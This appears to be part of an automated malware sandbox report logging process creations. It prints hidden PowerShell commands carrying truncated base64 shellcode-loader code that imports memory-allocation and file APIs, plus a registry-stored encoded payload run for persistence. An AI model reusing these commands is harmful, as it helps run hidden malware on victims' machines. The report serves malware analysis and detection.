            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATg
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD18D.tmp" "c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34E6.tmp" "c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES728B.tmp" "c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdlineJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD18D.tmp" "c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbg